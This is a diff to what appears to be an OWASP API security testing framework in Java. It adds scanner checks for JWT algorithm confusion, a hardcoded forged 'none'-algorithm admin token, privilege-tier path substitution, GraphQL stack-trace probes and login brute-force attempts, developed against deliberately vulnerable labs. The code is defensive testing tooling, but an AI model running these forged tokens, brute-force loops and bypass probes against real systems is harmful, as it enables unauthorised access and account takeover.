+            case "PUT"    -> httpClient.putWithStatus(fullUrl, Map.of(), "application/json", "{}");
+            case "DELETE" -> httpClient.deleteWithStatus(fullUrl, Map.of());
+            default       -> httpClient.getWithStatus(fullUrl, Map.of());
+        };
+    }
+
+    /** Signs {@code header}.{@code payload} with HS256, producing a complete, valid-shaped JWT. */
+    private String signHs256(String headerJson, String payloadJson, byte[] secret) throws Exception {
+        String headerB64 = base64UrlEncode(headerJson.getBytes(StandardCharsets.UTF_8));
+        String payloadB64 = base64UrlEncode(payloadJson.getBytes(StandardCharsets.UTF_8));
+        String signingInput = headerB64 + "." + payloadB64;
+
+        Mac mac = Mac.getInstance("HmacSHA256");
+        // HmacSHA256 requires a non-empty key — a genuinely empty secret (the /dev/null case) is
+        // represented as a single zero byte, which produces the same practical effect for this
+        // test's purposes (a fixed, attacker-known "secret") without tripping InvalidKeyException.
+        byte[] keyBytes = secret.length == 0 ? new byte[]{0} : secret;
+        mac.init(new SecretKeySpec(keyBytes, "HmacSHA256"));
+        byte[] signature = mac.doFinal(signingInput.getBytes(StandardCharsets.UTF_8));
+
+        return signingInput + "." + base64UrlEncode(signature);
+    }
+
+    private String base64UrlEncode(byte[] data) {
+        return Base64.getUrlEncoder().withoutPadding().encodeToString(data);
+    }
+
+    // Memoizes fetchRsaPublicKeyBytes per base URL, since the JWKS location is a property of the
+    // target as a whole, not of any individual endpoint — without this, a scan with N endpoints
+    // repeated the same (usually all-404) JWKS probe N times over, once per endpoint, needlessly
+    // multiplying scan duration. A zero-length array is the "checked, nothing found" sentinel
+    // (a real encoded RSA key is never empty), distinguishing "not yet checked" (absent from the
+    // map) from "checked and no JWKS exists" (present, empty) in this thread-safe cache.
+    private final Map<String, byte[]> jwksCache = new java.util.concurrent.ConcurrentHashMap<>();
+    private static final byte[] JWKS_NOT_FOUND = new byte[0];
+
+    /**
+     * Attempts to fetch and parse an RSA public key from a JWKS endpoint at a few common paths.
+     * Returns the key's X.509-encoded bytes (the classic algorithm-confusion technique's HMAC
+     * secret material), or {@code null} if no JWKS is exposed or the first key isn't RSA.
+     */
+    private byte[] fetchRsaPublicKeyBytes(EndpointInfo endpoint, HttpClient httpClient) {
+        String baseUrl = endpoint.getBaseUrl() != null ? endpoint.getBaseUrl() : "";
+        byte[] cached = jwksCache.computeIfAbsent(baseUrl, url -> {
+            byte[] result = fetchRsaPublicKeyBytesUncached(url, httpClient);
+            return result != null ? result : JWKS_NOT_FOUND;
+        });
+        return cached == JWKS_NOT_FOUND ? null : cached;
+    }
+
+    private byte[] fetchRsaPublicKeyBytesUncached(String baseUrl, HttpClient httpClient) {
+        List<String> jwksPaths = List.of("/.well-known/jwks.json", "/jwks.json", "/oauth/jwks", "/auth/jwks.json");
+
+        for (String path : jwksPaths) {
+            try {
+                HttpResponse response = httpClient.getWithStatus(baseUrl + path, Map.of());
+                if (response == null || !response.isSuccess() || response.getBody() == null) {
+                    continue;
+                }
+                JsonNode root = objectMapper.readTree(response.getBody());
+                JsonNode keys = root.path("keys");
+                if (!keys.isArray() || keys.isEmpty()) {
+                    continue;
+                }
+                JsonNode key = keys.get(0);
+                String n = key.path("n").asText(null);
+                String e = key.path("e").asText(null);
+                if (n == null || e == null) {
+                    continue;
+                }
+
+                BigInteger modulus = new BigInteger(1, Base64.getUrlDecoder().decode(n));
+                BigInteger exponent = new BigInteger(1, Base64.getUrlDecoder().decode(e));
+                KeyFactory keyFactory = KeyFactory.getInstance("RSA");
+                PublicKey publicKey = keyFactory.generatePublic(new RSAPublicKeySpec(modulus, exponent));
+                return publicKey.getEncoded();
+            } catch (Exception ex) {
+                logger.debug("No usable JWKS at {}: {}", path, ex.getMessage());
+            }
+        }
+        return null;
     }
 
     /**

--- a/src/main/java/org/owasp/astf/testcases/BrokenFunctionLevelAuthorizationTestCase.java
+++ b/src/main/java/org/owasp/astf/testcases/BrokenFunctionLevelAuthorizationTestCase.java
@@ -36,6 +36,20 @@ public class BrokenFunctionLevelAuthorizationTestCase implements TestCase {
 
     private static final List<String> SENSITIVE_HTTP_METHODS = List.of("PUT", "DELETE", "PATCH");
 
+    // A path segment that exactly matches one of these (case-insensitive) is a candidate for
+    // privilege-tier substitution — swapping it for a higher-privilege keyword and replaying the
+    // SAME request (same credentials, same ID, same method) at that alternate path. Found by
+    // tracing crAPI's actual source: its real BFLA vulnerability is exactly this pattern —
+    // DELETE /identity/api/v2/user/videos/{id} is a deliberate decoy that always returns
+    // 403/404, while DELETE /identity/api/v2/admin/videos/{id} (same ID, same non-admin token)
+    // succeeds with no role check at all. Appending a generic "/admin" to the base URL root
+    // (see testAdminEndpointAccess) never finds this, since the vulnerable path only exists as a
+    // sibling of an already-known, specific resource endpoint.
+    private static final List<String> LOW_PRIVILEGE_SEGMENT_KEYWORDS = List.of("user", "customer", "member", "public");
+    private static final List<String> HIGH_PRIVILEGE_SEGMENT_REPLACEMENTS = List.of(
+            "admin", "administrator", "internal", "staff", "management", "superuser"
+    );
+
     @Override
     public String getId() {
         return "ASTF-API5-2023";
@@ -59,8 +73,109 @@ public class BrokenFunctionLevelAuthorizationTestCase implements TestCase {
 
         findings.addAll(testAdminEndpointAccess(endpoint, httpClient));
         findings.addAll(testHttpMethodEscalation(endpoint, httpClient));
+        findings.addAll(testPrivilegeTierPathSubstitution(endpoint, httpClient));
 
         return findings;
+    }
+
+    /**
+     * Substitutes a low-privilege path segment (e.g. {@code /user/}) with a high-privilege one
+     * (e.g. {@code /admin/}) in an otherwise identical, already-known resource path — same
+     * method, same ID, same credentials — and checks whether the substituted path succeeds where
+     * the original wouldn't (or where no elevated role should be able to succeed with a
+     * non-elevated token). This is the "predictable REST naming" BFLA pattern named directly in
+     * crAPI's own challenge doc ("leverage the predictable nature of REST APIs to find an admin
+     * endpoint"), confirmed against crAPI's real source: the vulnerable endpoint only exists as
+     * a same-shaped sibling of a known user-facing one, which {@link #testAdminEndpointAccess}
+     * (root-relative admin paths only) can never reach.
+     */
+    List<Finding> testPrivilegeTierPathSubstitution(EndpointInfo endpoint, HttpClient httpClient) {
+        List<Finding> findings = new ArrayList<>();
+        String baseUrl = endpoint.getBaseUrl();
+        if (baseUrl == null || baseUrl.isEmpty()) {
+            return findings;
+        }
+
+        String path = endpoint.getPath();
+        String[] segments = path.split("/");
+        int targetIndex = -1;
+        for (int i = 0; i < segments.length; i++) {
+            if (LOW_PRIVILEGE_SEGMENT_KEYWORDS.stream().anyMatch(segments[i]::equalsIgnoreCase)) {
+                targetIndex = i;
+                break;
+            }
+        }
+        if (targetIndex == -1) {
+            return findings;
+        }
+
+        try {
+            HttpResponse originalResponse = makeRequest(endpoint, endpoint.getFullUrl(), httpClient);
+
+            for (String replacement : HIGH_PRIVILEGE_SEGMENT_REPLACEMENTS) {
+                String[] altSegments = segments.clone();
+                altSegments[targetIndex] = replacement;
+                String altPath = String.join("/", altSegments);
+                String altUrl = buildUrl(baseUrl, altPath);
+
+                try {
+                    HttpResponse altResponse = makeRequest(endpoint, altUrl, httpClient);
+
+                    if (altResponse != null && altResponse.isSuccess() && isApiResponse(altResponse)
+                            && (originalResponse == null || !originalResponse.isSuccess())) {
+
+                        Finding finding = new Finding(
+                                UUID.randomUUID().toString(),
+                                "Broken Function Level Authorization (Privilege-Tier Path Substitution)",
+                                String.format("Replacing the '%s' path segment with '%s' in an otherwise " +
+                                        "identical request (%s %s) succeeded using the same, non-elevated " +
+                                        "credentials — indicating the higher-privilege-tier endpoint performs " +
+                                        "no role check of its own.",
+                                        segments[targetIndex], replacement, endpoint.getMethod(), path),
+                                Severity.CRITICAL,
+                                getId(),
+                                endpoint.getMethod() + " " + path,
+                                "Enforce role-based access control on every endpoint independently of naming " +
+                                "convention. An endpoint's path (e.g. containing '/admin/') must never be the " +
+                                "only thing distinguishing its authorization requirements from a sibling path."
+                        );
+                        finding.setRequestDetails("Original: " + endpoint.getMethod() + " " + endpoint.getFullUrl() +
+                                "\nSubstituted: " + endpoint.getMethod() + " " + altUrl);
+                        finding.setResponseDetails("Original status: " +
+                                (originalResponse != null ? originalResponse.getStatusCode() : "n/a") +
+                                "\nSubstituted status: " + altResponse.getStatusCode());
+                        findings.add(finding);
+                        return findings; // one confirmed instance is enough for this endpoint
+                    }
+                } catch (Exception e) {
+                    logger.debug("Error testing privilege-tier substitution ({}) on {}: {}",
+                            replacement, endpoint, e.getMessage());
+                }
+            }
+        } catch (Exception e) {
+            logger.debug("Error testing privilege-tier path substitution on {}: {}", endpoint, e.getMessage());
+        }
+
+        return findings;
+    }
+
+    private HttpResponse makeRequest(EndpointInfo endpoint, String url, HttpClient httpClient) throws IOException {
+        return switch (endpoint.getMethod().toUpperCase()) {
+            case "GET"    -> httpClient.getWithStatus(url, Map.of());
+            case "POST"   -> httpClient.postWithStatus(url, Map.of(), endpoint.getContentType(),
+                                endpoint.getRequestBody() != null ? endpoint.getRequestBody() : "{}");
+            case "PUT"    -> httpClient.putWithStatus(url, Map.of(), endpoint.getContentType(),
+                                endpoint.getRequestBody() != null ? endpoint.getRequestBody() : "{}");
+            case "PATCH"  -> httpClient.patchWithStatus(url, Map.of(), endpoint.getContentType(),
+                                endpoint.getRequestBody() != null ? endpoint.getRequestBody() : "{}");
+            case "DELETE" -> httpClient.deleteWithStatus(url, Map.of());
+            default       -> httpClient.getWithStatus(url, Map.of());
+        };
+    }
+
+    private String buildUrl(String baseUrl, String path) {
+        String base = baseUrl.endsWith("/") ? baseUrl.substring(0, baseUrl.length() - 1) : baseUrl;
+        return base + (path.startsWith("/") ? path : "/" + path);
     }
 
     private List<Finding> testAdminEndpointAccess(EndpointInfo endpoint, HttpClient httpClient) {

--- a/src/main/java/org/owasp/astf/testcases/BrokenObjectLevelAuthorizationTestCase.java
+++ b/src/main/java/org/owasp/astf/testcases/BrokenObjectLevelAuthorizationTestCase.java
@@ -17,6 +17,9 @@ import org.owasp.astf.core.http.HttpResponse;
 import org.owasp.astf.core.result.Finding;
 import org.owasp.astf.core.result.Severity;
 
+import com.fasterxml.jackson.databind.JsonNode;
+import com.fasterxml.jackson.databind.ObjectMapper;
+
 /**
  * Tests for API1:2023 Broken Object Level Authorization (BOLA/IDOR).
  *
@@ -39,6 +42,21 @@ public class BrokenObjectLevelAuthorizationTestCase implements TestCase {
     // IDs to substitute when testing for BOLA
     private static final List<String> ALTERNATIVE_NUMERIC_IDS = List.of("1", "2", "100", "999", "0");
     private static final String ALTERNATIVE_UUID = "00000000-0000-0000-0000-000000000001";
+
+    // Used to build a realistic PUT/POST/PATCH body when the endpoint has no discovered request
+    // body — found necessary by live-testing VAmPI's password-change endpoint: sending "{}" let
+    // the request reach the endpoint, but never actually exercised the password-change semantics
+    // the vulnerability is about, understating what "cross-user access confirmed" should mean for
+    // a state-changing request. Extra fields an endpoint doesn't expect are typically ignored, so
+    // sending all of these together costs nothing.
+    private static final List<Map.Entry<String, String>> COMMON_STATE_CHANGE_BODY_FIELDS = List.of(
+            Map.entry("password", "N3wP@ssw0rd!"),
+            Map.entry("new_password", "N3wP@ssw0rd!"),
+            Map.entry("email", "test@example.com"),
+            Map.entry("name", "Test User")
+    );
+
+    private final ObjectMapper objectMapper = new ObjectMapper();
 
     @Override
     public String getId() {
@@ -261,13 +279,41 @@ public class BrokenObjectLevelAuthorizationTestCase implements TestCase {
                                       Map<String, String> headers) throws IOException {
         return switch (endpoint.getMethod().toUpperCase()) {
             case "GET"    -> httpClient.getWithStatus(url, headers);
-            case "POST"   -> httpClient.postWithStatus(url, headers, endpoint.getContentType(),
-                                endpoint.getRequestBody() != null ? endpoint.getRequestBody() : "{}");
-            case "PUT"    -> httpClient.putWithStatus(url, headers, endpoint.getContentType(),
-                                endpoint.getRequestBody() != null ? endpoint.getRequestBody() : "{}");
+            case "POST"   -> httpClient.postWithStatus(url, headers, endpoint.getContentType(), resolveRequestBody(endpoint));
+            case "PUT"    -> httpClient.putWithStatus(url, headers, endpoint.getContentType(), resolveRequestBody(endpoint));
             case "DELETE" -> httpClient.deleteWithStatus(url, headers);
             default       -> httpClient.getWithStatus(url, headers);
         };
+    }
+
+    /**
+     * Returns the endpoint's own discovered request body when it's a usable, non-empty JSON
+     * object, otherwise builds a realistic body from common field names (see
+     * {@link #COMMON_STATE_CHANGE_BODY_FIELDS}) rather than falling back to an empty {@code "{}"}
+     * — an empty body reaches a PUT/POST endpoint but doesn't exercise its actual state-changing
+     * behavior, which is exactly what {@link #testCrossUserAccess} needs to prove.
+     */
+    private String resolveRequestBody(EndpointInfo endpoint) {
+        String discovered = endpoint.getRequestBody();
+        if (discovered != null && !discovered.isBlank()) {
+            try {
+                JsonNode root = objectMapper.readTree(discovered);
+                if (root.isObject() && root.size() > 0) {
+                    return discovered;
+                }
+            } catch (Exception e) {
+                logger.debug("Discovered request body for {} isn't valid JSON, using fallback: {}",
+                        endpoint, e.getMessage());
+            }
+        }
+        StringBuilder sb = new StringBuilder("{");
+        for (int i = 0; i < COMMON_STATE_CHANGE_BODY_FIELDS.size(); i++) {
+            if (i > 0) sb.append(",");
+            Map.Entry<String, String> field = COMMON_STATE_CHANGE_BODY_FIELDS.get(i);
+            sb.append("\"").append(field.getKey()).append("\":\"").append(field.getValue()).append("\"");
+        }
+        sb.append("}");
+        return sb.toString();
     }
 
     private String buildUrl(EndpointInfo endpoint, String path) {

--- a/src/main/java/org/owasp/astf/testcases/BrokenObjectLevelAuthorizationTestCase.java
+++ b/src/main/java/org/owasp/astf/testcases/BrokenObjectLevelAuthorizationTestCase.java
@@ -11,6 +11,7 @@ import java.util.regex.Pattern;
 import org.apache.logging.log4j.LogManager;
 import org.apache.logging.log4j.Logger;
 import org.owasp.astf.core.EndpointInfo;
+import org.owasp.astf.core.discovery.PathTemplateResolver;
 import org.owasp.astf.core.http.HttpClient;
 import org.owasp.astf.core.http.HttpResponse;
 import org.owasp.astf.core.result.Finding;
@@ -60,9 +61,15 @@ public class BrokenObjectLevelAuthorizationTestCase implements TestCase {
         logger.info("Executing {} test on {}", getId(), endpoint);
         List<Finding> findings = new ArrayList<>();
 
-        findings.addAll(testCrossUserAccess(endpoint, httpClient));
-        findings.addAll(testNumericIdManipulation(endpoint, httpClient));
-        findings.addAll(testUuidManipulation(endpoint, httpClient));
+        // Centralized in PathTemplateResolver — Scanner already calls this for every endpoint
+        // before test cases run, so in normal operation this is a fast no-op; it's called here
+        // too so BOLA still resolves correctly when invoked directly (e.g. in unit tests) without
+        // going through Scanner first.
+        EndpointInfo resolvedEndpoint = PathTemplateResolver.resolve(endpoint, httpClient);
+
+        findings.addAll(testCrossUserAccess(resolvedEndpoint, httpClient));
+        findings.addAll(testNumericIdManipulation(resolvedEndpoint, httpClient));
+        findings.addAll(testUuidManipulation(resolvedEndpoint, httpClient));
 
         return findings;
     }
@@ -77,6 +84,12 @@ public class BrokenObjectLevelAuthorizationTestCase implements TestCase {
      * <p>
      * Skips entirely when no secondary identity is configured — {@link HttpClient#getSecondaryAuthHeaders()}
      * returns an empty map in that case, and the single-identity checks above remain the fallback.
+     *
+     * Unlike {@link #testNumericIdManipulation}/{@link #testUuidManipulation}, which need a
+     * numeric/UUID value to substitute an alternative into, this check only compares two
+     * identities against the same URL — so a successfully-resolved non-numeric, non-UUID value
+     * (a username, slug, or title — see {@link EndpointInfo#isResolvedFromTemplate()}) is just
+     * as valid a target here as a numeric/UUID one.
      */
     private List<Finding> testCrossUserAccess(EndpointInfo endpoint, HttpClient httpClient) {
         List<Finding> findings = new ArrayList<>();
@@ -93,7 +106,7 @@ public class BrokenObjectLevelAuthorizationTestCase implements TestCase {
         }
         boolean hasNumericId = NUMERIC_ID_PATTERN.matcher(endpoint.getPath()).find();
         boolean hasUuid = UUID_PATTERN.matcher(endpoint.getPath()).find();
-        if (!hasNumericId && !hasUuid) {
+        if (!hasNumericId && !hasUuid && !endpoint.isResolvedFromTemplate()) {
             return findings;
         }
 

--- a/src/main/java/org/owasp/astf/testcases/GraphQLSecurityTestCase.java
+++ b/src/main/java/org/owasp/astf/testcases/GraphQLSecurityTestCase.java
@@ -83,12 +83,51 @@ public class GraphQLSecurityTestCase implements TestCase {
     // than (or in addition to) the Authorization header.
     private static final List<String> CURRENT_USER_FIELD_NAMES = List.of("me", "viewer", "currentUser", "profile");
 
+    // Argument names shaped like a token/credential rather than ordinary user input — excluded
+    // from testFieldInjection's generic SQL/XSS/path-traversal payload battery. Found necessary
+    // by live-testing against DVGA: its "me(token: String)" query field only surfaces once the
+    // 5-field extraction cap is removed (it sits at schema position 11), and feeding it generic
+    // injection payloads instead of a real JWT shape repeatedly hits DVGA's JWT-decode path with
+    // garbage, which crashed the container outright (reproducible, single-threaded, exit 139) —
+    // not just a wasted request. A token-shaped argument is already tested appropriately, with a
+    // real forged-JWT payload, by testArgumentBasedAuthBypass.
+    private static final List<String> TOKEN_LIKE_ARG_NAMES = List.of("token", "jwt", "apikey", "api_key", "sessionid", "session_id");
+
     // JWT with "none" algorithm, claiming an admin subject — the same forged-token technique
     // BrokenAuthenticationTestCase uses for header-based bypass, reused here as a query argument.
     private static final String NONE_ALG_JWT_ARG =
             "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0" +
             ".eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkFkbWluIiwicm9sZSI6ImFkbWluIn0" +
             ".";
+
+    // Mutation-name keywords identifying a login/authentication field — the target for the
+    // brute-force lockout check, mirroring BrokenAuthenticationTestCase's REST-side check but
+    // applied to a GraphQL argument-based login instead of a JSON body (found needed: DVGA's own
+    // "Weak Password / Brute Force" scenario is a GraphQL login mutation, which the REST-oriented
+    // check never reaches since it never sends a GraphQL-shaped request body).
+    private static final List<String> LOGIN_MUTATION_KEYWORDS = List.of("login", "signin", "authenticate", "auth");
+    private static final List<String> USERNAME_ARG_NAMES = List.of("username", "email", "login", "user");
+    private static final List<String> PASSWORD_ARG_NAMES = List.of("password", "pass", "pwd");
+    private static final int GRAPHQL_BRUTE_FORCE_ATTEMPTS = 8;
+
+    // Malformed/type-invalid GraphQL request bodies, sent as raw strings — meant to trigger a
+    // resolver-level or query-execution exception rather than a clean schema-validation rejection,
+    // the same intent as SecurityMisconfigurationTestCase's malformed-payload probe but shaped for
+    // GraphQL's JSON envelope instead of a REST body.
+    private static final List<String> STACK_TRACE_PROBE_QUERIES = List.of(
+            "{\"query\":\"{__schema{types{name fields{name args{name type{name ofType{name",
+            "{\"query\":\"query{__type(name:123){name}}\"}",
+            "{\"query\":\"mutation{createPaste(title:null,content:null){id}}\"}"
+    );
+
+    // Python/Flask/Ariadne-style traceback markers (DVGA's actual backend) alongside the same
+    // generic exception/stack-trace indicators SecurityMisconfigurationTestCase already uses for
+    // the REST-side equivalent check.
+    private static final List<String> STACK_TRACE_INDICATORS = List.of(
+            "traceback (most recent call last)", "file \"", ", line ", "raise ",
+            "stack trace", "stacktrace", "at org.", "at java.", "at com.",
+            "nullpointerexception", "sqlexception", "internal server error at", "caused by:"
+    );
 
     // Standard introspection query — smallest form that reveals the full schema
     private static final String INTROSPECTION_QUERY =
@@ -238,6 +277,8 @@ public class GraphQLSecurityTestCase implements TestCase {
         findings.addAll(testGraphiQLExposure(endpoint, httpClient));
         findings.addAll(testOperationDenyListBypass(endpoint, httpClient));
         findings.addAll(testArgumentBasedAuthBypass(endpoint, httpClient));
+        findings.addAll(testStackTraceDisclosure(endpoint, httpClient));
+        findings.addAll(testLoginMutationBruteForce(endpoint, httpClient));
 
         return findings;
     }
@@ -845,6 +886,152 @@ public class GraphQLSecurityTestCase implements TestCase {
         return findings;
     }
 
+    // ── Test: stack trace / debug error disclosure ────────────────────────────
+
+    /**
+     * Sends malformed/type-invalid GraphQL requests designed to trigger a resolver-level or
+     * query-execution exception, then checks whether the response body leaks a raw stack trace or
+     * other internal implementation detail rather than a clean, generic error message — the
+     * GraphQL-shaped equivalent of {@code SecurityMisconfigurationTestCase#testVerboseErrors},
+     * which never runs against GraphQL endpoints since it POSTs a plain malformed body rather than
+     * a {@code {"query": "..."}} envelope and never gets past the server's JSON-parse step.
+     */
+    List<Finding> testStackTraceDisclosure(EndpointInfo endpoint, HttpClient httpClient) {
+        List<Finding> findings = new ArrayList<>();
+
+        for (String probe : STACK_TRACE_PROBE_QUERIES) {
+            try {
+                HttpResponse response = httpClient.postWithStatus(
+                        endpoint.getFullUrl(), Map.of(), CONTENT_TYPE_JSON, probe);
+                String body = response != null ? response.getBody() : null;
+                if (body == null) {
+                    continue;
+                }
+
+                String lowerBody = body.toLowerCase();
+                List<String> foundIndicators = new ArrayList<>();
+                for (String indicator : STACK_TRACE_INDICATORS) {
+                    if (lowerBody.contains(indicator)) {
+                        foundIndicators.add(indicator);
+                    }
+                }
+
+                if (!foundIndicators.isEmpty()) {
+                    Finding f = new Finding(
+                            UUID.randomUUID().toString(),
+                            "GraphQL Stack Trace / Debug Error Disclosure",
+                            "A malformed or type-invalid GraphQL request produced a response containing " +
+                            "raw implementation details (" + String.join(", ", foundIndicators) + ") " +
+                            "instead of a generic error message — this reveals framework, file paths, and " +
+                            "internal logic useful for crafting further attacks.",
+                            Severity.MEDIUM,
+                            getId(),
+                            "POST " + endpoint.getPath(),
+                            "Catch resolver-level exceptions and return a generic error message to the " +
+                            "client. Log the full exception server-side only, and disable any GraphQL " +
+                            "server debug/development mode in production."
+                    );
+                    f.setEvidence("Query: " + probe + "\nIndicators found: " + String.join(", ", foundIndicators));
+                    findings.add(f);
+                    return findings; // one confirmed instance is enough
+                }
+            } catch (Exception e) {
+                logger.debug("Error testing GraphQL stack trace disclosure on {}: {}", endpoint, e.getMessage());
+            }
+        }
+
+        return findings;
+    }
+
+    // ── Test: login mutation brute-force lockout ──────────────────────────────
+
+    /**
+     * Introspects mutation fields for a login/authentication-shaped mutation (name containing
+     * "login", "signin", "authenticate", or "auth", with both a username-like and password-like
+     * String argument), then sends {@link #GRAPHQL_BRUTE_FORCE_ATTEMPTS} consecutive failed
+     * attempts and checks whether the server ever responds with a rate-limit/lockout signal —
+     * the GraphQL-argument equivalent of {@code BrokenAuthenticationTestCase#testBruteForceLockout},
+     * which only ever sends a REST-shaped JSON body and never reaches a GraphQL login mutation.
+     */
+    List<Finding> testLoginMutationBruteForce(EndpointInfo endpoint, HttpClient httpClient) {
+        List<Finding> findings = new ArrayList<>();
+        try {
+            HttpResponse introspectionResponse = httpClient.postWithStatus(
+                    endpoint.getFullUrl(), Map.of(), CONTENT_TYPE_JSON, MUTATION_INTROSPECTION_QUERY);
+            if (!isAcceptedGraphQLQuery(introspectionResponse)) {
+                return findings;
+            }
+
+            List<MutationCandidate> allCandidates = extractStringArgFields(
+                    introspectionResponse.getBody(), "mutationType");
+
+            MutationCandidate loginMutation = null;
+            String usernameArg = null;
+            String passwordArg = null;
+            for (MutationCandidate candidate : allCandidates) {
+                String lowerName = candidate.name().toLowerCase();
+                if (LOGIN_MUTATION_KEYWORDS.stream().noneMatch(lowerName::contains)) {
+                    continue;
+                }
+                String foundUsernameArg = candidate.allArgs().stream()
+                        .map(ArgSpec::name)
+                        .filter(name -> USERNAME_ARG_NAMES.stream().anyMatch(name.toLowerCase()::contains))
+                        .findFirst().orElse(null);
+                String foundPasswordArg = candidate.allArgs().stream()
+                        .map(ArgSpec::name)
+                        .filter(name -> PASSWORD_ARG_NAMES.stream().anyMatch(name.toLowerCase()::contains))
+                        .findFirst().orElse(null);
+                if (foundUsernameArg != null && foundPasswordArg != null) {
+                    loginMutation = candidate;
+                    usernameArg = foundUsernameArg;
+                    passwordArg = foundPasswordArg;
+                    break;
+                }
+            }
+            if (loginMutation == null) {
+                return findings;
+            }
+
+            HttpResponse lastResponse = null;
+            for (int attempt = 0; attempt < GRAPHQL_BRUTE_FORCE_ATTEMPTS; attempt++) {
+                String mutationCall = String.format(
+                        "mutation{%s(%s:\\\"admin\\\",%s:\\\"WrongPass-%d!\\\"){__typename}}",
+                        loginMutation.name(), usernameArg, passwordArg, attempt);
+                String requestBody = "{\"query\":\"" + mutationCall + "\"}";
+
+                lastResponse = httpClient.postWithStatus(endpoint.getFullUrl(), Map.of(), CONTENT_TYPE_JSON, requestBody);
+                if (lastResponse == null) {
+                    return findings;
+                }
+                if (lastResponse.isRateLimited() || lastResponse.getStatusCode() == 423) {
+                    return findings; // lockout/rate-limiting is working correctly
+                }
+            }
+
+            Finding f = new Finding(
+                    UUID.randomUUID().toString(),
+                    "No Account Lockout or Rate Limiting on GraphQL Login Mutation",
+                    String.format("%d consecutive failed login attempts against the '%s' mutation produced " +
+                            "no rate-limiting or lockout response (HTTP 429/423). This allows unrestricted " +
+                            "brute-force and credential-stuffing attacks against user accounts via GraphQL.",
+                            GRAPHQL_BRUTE_FORCE_ATTEMPTS, loginMutation.name()),
+                    Severity.MEDIUM,
+                    getId(),
+                    "POST " + endpoint.getPath() + " (mutation " + loginMutation.name() + ")",
+                    "Implement account lockout or exponential rate limiting after a small number of failed " +
+                    "attempts (e.g. 5), and consider CAPTCHA or IP-based throttling for repeated failures — " +
+                    "regardless of whether login happens over REST or GraphQL."
+            );
+            f.setEvidence("Last of " + GRAPHQL_BRUTE_FORCE_ATTEMPTS + " attempts returned HTTP " +
+                    lastResponse.getStatusCode() + " with no lockout signal");
+            findings.add(f);
+        } catch (Exception e) {
+            logger.debug("Error testing GraphQL login brute-force on {}: {}", endpoint, e.getMessage());
+        }
+
+        return findings;
+    }
+
     // ── Test 5: Resolver-level injection ─────────────────────────────────────
 
     /**
@@ -857,7 +1044,8 @@ public class GraphQLSecurityTestCase implements TestCase {
      * {@link #testIntrospectionEnabled}) — without the schema, there's no way to know which
      * mutations exist or what arguments they accept without guessing field names, which fails
      * schema validation before ever reaching the resolver (the same class of bug fixed for the
-     * query-depth probe). Limited to the first 5 discovered mutations to bound request volume.
+     * query-depth probe). Every discovered mutation/query field is tested — see
+     * {@link #extractStringArgFields}.
      * <p>
      * Two real-world complications this handles, found by testing against DVGA rather than just
      * unit tests: (1) many resolvers require values for arguments the schema marks as nullable —
@@ -883,7 +1071,7 @@ public class GraphQLSecurityTestCase implements TestCase {
      * Shared implementation behind {@link #testResolverInjection}, parameterized over whether
      * it's testing {@code mutationType} or {@code queryType} fields.
      * <p>
-     * Tests every discovered candidate field (bounded to 5, see {@link #extractStringArgFields}),
+     * Tests every discovered candidate field (see {@link #extractStringArgFields}),
      * not just the first one that yields a finding — a mutation being vulnerable doesn't mean
      * every other mutation is safe, and stopping at the first confirmed hit (the original
      * behavior) silently skipped every other candidate in the same scan.
@@ -1005,8 +1193,13 @@ public class GraphQLSecurityTestCase implements TestCase {
      * Parses a mutationType/queryType introspection response and returns, for each field with at
      * least one String-typed argument, its name, its first String argument (the injection
      * target), every argument the field accepts (so all of them can be given a valid default —
-     * see {@link #testFieldInjection}), and its own resolved return type name. Bounded to the
-     * first 5 fields found, to keep request volume reasonable.
+     * see {@link #testFieldInjection}), and its own resolved return type name.
+     * <p>
+     * Every candidate field is returned — an earlier version bounded this to the first 5 fields
+     * found to limit request volume, but that silently dropped every field beyond the bound from
+     * testing entirely (confirmed live: DVGA's importPaste SSRF/OS-injection and uploadPaste path
+     * traversal all sit past position 5 in the schema and were never reached). Coverage completeness
+     * takes priority over request-volume trimming here.
      */
     List<MutationCandidate> extractStringArgFields(String introspectionBody, String schemaFieldName) {
         List<MutationCandidate> results = new ArrayList<>();
@@ -1017,7 +1210,6 @@ public class GraphQLSecurityTestCase implements TestCase {
                 return results;
             }
             for (JsonNode field : fields) {
-                if (results.size() >= 5) break;
                 String mutationName = field.path("name").asText(null);
                 if (mutationName == null) continue;
 
@@ -1028,7 +1220,9 @@ public class GraphQLSecurityTestCase implements TestCase {
                     if (argName == null) continue;
                     String argType = resolveScalarTypeName(arg.path("type"));
                     allArgs.add(new ArgSpec(argName, argType));
-                    if (targetArgName == null && "String".equals(argType)) {
+                    boolean isTokenLikeArg = TOKEN_LIKE_ARG_NAMES.stream()
+                            .anyMatch(argName.toLowerCase()::contains);
+                    if (targetArgName == null && "String".equals(argType) && !isTokenLikeArg) {
                         targetArgName = argName;
                     }
                 }

--- a/src/main/java/org/owasp/astf/testcases/GraphQLSecurityTestCase.java
+++ b/src/main/java/org/owasp/astf/testcases/GraphQLSecurityTestCase.java
@@ -59,6 +59,37 @@ public class GraphQLSecurityTestCase implements TestCase {
             "/api/query"
     );
 
+    // GraphQL IDE/explorer interfaces — never meant to be reachable in production, since they
+    // expose the full schema and a live query console to anyone who finds the path.
+    private static final List<String> GRAPHQL_IDE_PATHS = List.of(
+            "/graphiql", "/graphql-playground", "/playground", "/altair", "/voyager", "/graphql/console"
+    );
+
+    // A guessed cookie some targets use to gate an otherwise-blocked debug/IDE interface behind —
+    // client-controllable "trust" flags like this are a common, weak access-control pattern.
+    private static final Map<String, String> DEBUG_COOKIE_HEADERS = Map.of("Cookie", "debug=true; isAdmin=true");
+
+    // Keywords suggesting a query field is sensitive enough that a naive string-based deny-list
+    // (checking the raw query text rather than the parsed AST) might specifically target it —
+    // and therefore a good candidate for testing whether wrapping it in a fragment bypasses that
+    // deny-list (since a text-matching filter looking for "fieldName(" won't see it once it's
+    // referenced only via "...FragmentName").
+    private static final List<String> SENSITIVE_FIELD_KEYWORDS = List.of(
+            "admin", "debug", "diagnostic", "system", "internal", "secret", "config"
+    );
+
+    // Query fields commonly used to fetch the current authenticated user — the natural target
+    // for testing whether auth can be bypassed by passing a token as a query ARGUMENT rather
+    // than (or in addition to) the Authorization header.
+    private static final List<String> CURRENT_USER_FIELD_NAMES = List.of("me", "viewer", "currentUser", "profile");
+
+    // JWT with "none" algorithm, claiming an admin subject — the same forged-token technique
+    // BrokenAuthenticationTestCase uses for header-based bypass, reused here as a query argument.
+    private static final String NONE_ALG_JWT_ARG =
